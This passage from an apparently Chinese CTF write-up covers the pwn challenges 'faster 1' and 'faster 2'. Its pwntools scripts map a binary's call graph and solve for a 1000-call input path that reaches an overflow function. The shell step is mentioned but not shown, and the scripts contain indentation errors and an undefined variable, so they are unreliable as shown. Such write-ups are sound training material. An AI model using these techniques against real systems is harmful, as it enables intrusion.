class="number">0x5f</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">         function_id=u32(elf.data[func_id_address<span class="number">-0x400000</span>+<span class="number">2</span>]+<span class="string">"\x00\x00\x00"</span>)   </span><br><span class="line">         num=<span class="number">0x5d</span>   </span><br><span class="line">    function[function_id]=I</span><br><span class="line">    call_func=[]</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">11</span>):</span><br><span class="line">          call_asm=i+num+j*<span class="number">0xc</span></span><br><span class="line">          tmp=u32(elf.data[call_asm<span class="number">-0x400000</span>+<span class="number">1</span>:call_asm<span class="number">-0x400000</span>+<span class="number">4</span>+<span class="number">1</span>])</span><br><span class="line">          tmp_addr=call_asm+<span class="number">5</span></span><br><span class="line">          <span class="keyword">if</span> tmp&gt;<span class="number">0x80000000</span>:</span><br><span class="line">              tmp=tmp<span class="number">-0x100000000</span></span><br><span class="line">          next_func=call_asm+<span class="number">5</span>+tmp</span><br><span class="line">          call_func.append(next_func)</span><br><span class="line">    next_calls.append(call_func)</span><br><span class="line"><span class="keyword">print</span> next_calls</span><br><span class="line">ans=<span class="string">""</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">999</span>):</span><br><span class="line">      current=function[I]</span><br><span class="line">      next=function[I+<span class="number">1</span>]</span><br><span class="line">      ans+=str(next_calls[function_list.index(current)].index(next))</span><br><span class="line">ans+=str(next_calls[function_list.index(function[<span class="number">999</span>])].index(magic))</span><br><span class="line"><span class="keyword">print</span> ans</span><br></pre></td></tr></table></figure>
<p>getshell 同青龙faster 0，要动态改一下gadget的地址</p>
<h4 id="faster-2"><a href="#faster-2" class="headerlink" title="faster 2"></a>faster 2</h4><p>和faerst1类似<br>没有cmp的标示，不能确定函数的先后调用顺序<br>但是依然是每个函数调用一次，全局flag++<br>在存在溢出的函数中：<br><img src="https://upload-images.jianshu.io/upload_images/7434375-1d0c26caab545b06.png!thumbnail?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt=""><br>会判断flag是否已为1000<br>大体思路：需要想办法确定如何才能调用1000次函数<br>首先考虑的是哈密顿图，知道起点和终点，依次走完所有函数就可以了<br>程序较fast1比较好的地方是，中间函数没有cmp，所以没有一些asm的优化，所有函数地址固定，可以直接通过数据来得到整个函数间的调用关系，从而得到1000*1000的一个图<br>但是尝试用栈和递归写了一下，发现太慢了，容易跑死<br>继续看提取出的数据可以看到，我们可以得到两种路：<br>1.从起点出发：一直走某个case，有些case下可以得到一个函数，可以重新连接回起点<br>2.从起点出发：一直走某个case，有些case下可以得到一个函数，可以指向overflow函数<br>其中1构成的环存在多个：<br>假设1有两种环：长度 a,b<br>2有一种路：长度 c<br>所以直接求解 a*x+b*y+c=1000即可，abc已知，且a b不止两种组合，很容易得到一组解<br>用这组解构造payload即可<br>剩下的溢出部分则和faster1相同：<br>获得code：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">e=ELF(<span class="string">"./pwn2/fast1"</span>)</span><br><span class="line">funcs=[]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1001</span>):</span><br><span class="line">   funcs.append(<span class="number">0x4008a4</span>+<span class="number">0xce</span>*i)</span><br><span class="line">func_call=[]</span><br><span class="line">magic=[]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1001</span>):</span><br><span class="line">   tmp=[]</span><br><span class="line">   <span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">1001</span>):</span><br><span class="line">       tmp.append(<span class="number">10000</span>)</span><br><span class="line">   magic.append(tmp)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> funcs[:<span class="number">-1</span>]:</span><br><span class="line">    call_func=[]</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">10</span>):</span><br><span class="line">          call_addr=i+<span class="number">0x4e</span>+j*<span class="number">0xc</span></span><br><span class="line">   tmp=u32(e.data[call_addr<span class="number">-0x400000</span>+<span class="number">1</span>:call_addr<span class="number">-0x400000</span>+<span class="number">4</span>+<span class="number">1</span>])</span><br><span class="line">   tmp_addr=call_addr+<span class="number">5</span></span><br><span class="line">   <span class="keyword">if</span> tmp&gt;<span class="number">0x80000000</span>:</span><br><span class="line">         tmp=tmp<span class="number">-0x100000000</span></span><br><span class="line">   next_func=call_addr+<span class="number">5</span>+tmp</span><br><span class="line">   call_func.append(funcs.index(next_func))</span><br><span class="line">          magic[funcs.index(i)][funcs.index(next_func)]=<span class="number">1</span></span><br><span class="line">    func_call.append(call_func)</span><br><span class="line">start=u32(e.data[<span class="number">0x32e0f</span>+<span class="number">1</span>:<span class="number">0x32e0f</span>+<span class="number">1</span>+<span class="number">4</span>])+<span class="number">0x432E14</span><span class="number">-0x100000000</span></span><br><span class="line">end=<span class="number">0x432D54</span></span><br><span class="line">current=funcs.index(start)</span><br><span class="line">tmp=func_call[current]</span><br><span class="line">des=<span class="number">0</span></span><br><span class="line">final=<span class="number">0</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(len(func_call)):</span><br><span class="line">    <span class="keyword">if</span> <span class="number">1000</span> <span class="keyword">in</span> func_call[i]:</span><br><span class="line">         des=i</span><br><span class="line">         final=func_call[i].index(<span class="number">1000</span>)</span><br><span class="line"><span class="keyword">print</span> des</span><br><span class="line">code1=[]</span><br><span class="line">code2=[]</span><br><span class="line"><span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">10</span>):</span><br><span class="line"> tmp=func_call[current]</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1000</span>):</span><br><span class="line">    tmp=func_call[tmp[j]]</span><br><span class="line">    <span class="keyword">if</span> current <span class="keyword">in</span> tmp:</span><br><span class="line">         code1.append([j,i+<span class="number">2</span>,tmp.index(current)])</span><br><span class="line"><span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">10</span>):</span><br><span class="line"> tmp=func_call[current]</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1000</span>):</span><br><span class="line">    tmp=func_call[tmp[j]]</span><br><span class="line">    <span class="keyword">if</span> des <span class="keyword">in</span> tmp:</span><br><span class="line">         code2.append([j,i+<span class="number">2</span>,tmp.index(des)])</span><br><span class="line"><span class="keyword">print</span> code1</span><br><span class="line"><span class="keyword">print</span> code2</span><br><span class="line">m1=code1[<span class="number">0</span>]</span><br><span class="line">m2=code1[<span class="number">1</span>]</span><br><span class="line">m3=code2[<span class="number">0</span>]</span><br><span class="line">need=<span class="number">1000</span>-m3[<span class="number">1</span>]<span class="number">-1</span></span><br><span class="line">num1=m1[<span class="number">1</span>]</span><br><span class="line">num2=m2[<span class="number">1</span>]</span><br><span class="line">ans1=<span class="number">0</span></span><br><span class="line">ans2=<span class="number">0</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1000</span>):</span><br><span class="line">    <span class="keyword">if</span> (need-num1*i)%num2==<span class="number">0</span>:</span><br><span class="line">          ans1=i</span><br><span class="line">          ans2=(need-num1*i)/num2</span><br><span class="line">          <span class="keyword">break</span></span><br><span class="line"><span class="keyword">print</span> ans1,ans2</span><br><span class="line">s=(str(m1[<span class="number">0</span>])*(m1[<span class="number">1</span>]<span class="number">-1</span>)+str(m1[<span class="number">2</span>]))*ans1</span><br><span class="line">s+=(str(m2[<span class="number">0</span>])*(m2[<span class="number">1</span>]<span class="number">-1</span>)+str(m2[<span class="number">2</span>]))*ans2</span><br><span class="line">s+=str(m3[<span class="number">0</span>])*(m3[<span class="number">1</span>]<span class="number">-1</span>)+str(m3[<span class="number">2</span>])+str(final)</span><br><span class="line"><span class="keyword">print</span> s</span><br></pre></td></tr></table></figure>
<p>后面get shell与faster 0相同，改一下gadget地址即可</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a href="/links/">Links</a></li>
         
          <li><a href="/about/">About</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#0x01-青龙组"><span class="toc-number">1.</span> <span class="toc-text">0x01 青龙组</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#boom1"><span class="toc-number">1.1.</span> <span class="toc-text">boom1</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#boom2"><span class="toc-number">1.2.</span> <span class="toc-text">boom2</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#faster0"><span class="toc-number">1.3.</span> <span class="toc-text">faster0</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x02-白虎"><span class="toc-number">2.</span> <span class="toc-text">0x02 白虎</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x03-朱雀"><span class="toc-number">3.</span> <span class="toc-text">0x03 朱雀</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#云盾"><span class="toc-number">3.1.</span> <span class="toc-text">云盾</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#魔法房间"><span class="toc-number">3.2.</span> <span class="toc-text">魔法房间</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x04-玄武"><span class="toc-number">4.</span> <span class="toc-text">0x04 玄武</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#faster-1"><span class="toc-number">4.1.</span> <span class="toc-text">faster 1</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#faster-2"><span class="toc-number">4.2.</span> <span class="toc-text">faster 2</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://yoursite.com/2020/05/25/%E7%BD%91%E9%BC%8E%E6%9D%AF-1-4-%E8%84%9A%E6%9C%AC%E5%B0%8F%E8%AE%B0/" target="_blank" rel="noopener"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://yoursite.com/2020/05/25/%E7%BD%91%E9%BC%8E%E6%9D%AF-1-4-%E8%84%9A%E6%9C%AC%E5%B0%8F%E8%AE%B0/&text=网鼎杯  1-4 脚本小记" target="_blank" rel="noopener"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://yoursite.com/2020/05/25/%E7%BD%91%E9%BC%8E%E6%9D%AF-1-4-%E8%84%9A%E6%9C%AC%E5%B0%8F%E8%AE%B0/&title=网鼎杯  1-4 脚本小记" target="_blank" rel="noopener"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://yoursite.com/2020/05/25/%E7%BD%91%E9%BC%8E%E6%9D%AF-1-4-%E8%84%9A%E6%9C%AC%E5%B0%8F%E8%AE%B0/&is_video=false&description=网鼎杯  1-4 脚本小记" target="_blank" rel="noopener"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=网鼎杯  1-4 脚本小记&body=Check out this article: http://yoursite.com/2020/05/25/%E7%BD%91%E9%BC%8E%E6%9D%AF-1-4-%E8%84%9A%E6%9C%AC%E5%B0%8F%E8%AE%B0/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://yoursite.com/2020/05/25/%E7%BD%91%E9%BC%8E%E6%9D%AF-1-4-%E8%84%9A%E6%9C%AC%E5%B0%8F%E8%AE%B0/&title=网鼎杯  1-4 脚本小记" target="_blank" rel="noopener"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://yoursite.com/2020/05/25/%E7%BD%91%E9%BC%8E%E6%9D%AF-1-4-%E8%84%9A%E6%9C%AC%E5%B0%8F%E8%AE%B0/&title=网鼎杯  1-4 脚本小记" target="_blank" rel="noopener"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://yoursite.com/2020/05/25/%E7%BD%91%E9%BC%8E%E6%9D%AF-1-4-%E8%84%9A%E6%9C%AC%E5%B0%8F%E8%AE%B0/&title=网鼎杯  1-4 脚本小记" target="_blank" rel="noopener"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://yoursite.com/2020/05/25/%E7%BD%91%E9%BC%8E%E6%9D%AF-1-4-%E8%84%9A%E6%9C%AC%E5%B0%8F%E8%AE%B0/&title=网鼎杯  1-4 脚本小记" target="_blank" rel="noopener"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://yoursite.com/2020/05/25/%E7%BD%91%E9%BC%8E%E6%9D%AF-1-4-%E8%84%9A%E6%9C%AC%E5%B0%8F%E8%AE%B0/&name=网鼎杯  1-4 脚本小记&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy; 2020 Kirin
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a href="/links/">Links</a></li>
         
          <li><a href="/about/">About</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
</body>
</html>
<!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


<!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Disqus Comments -->


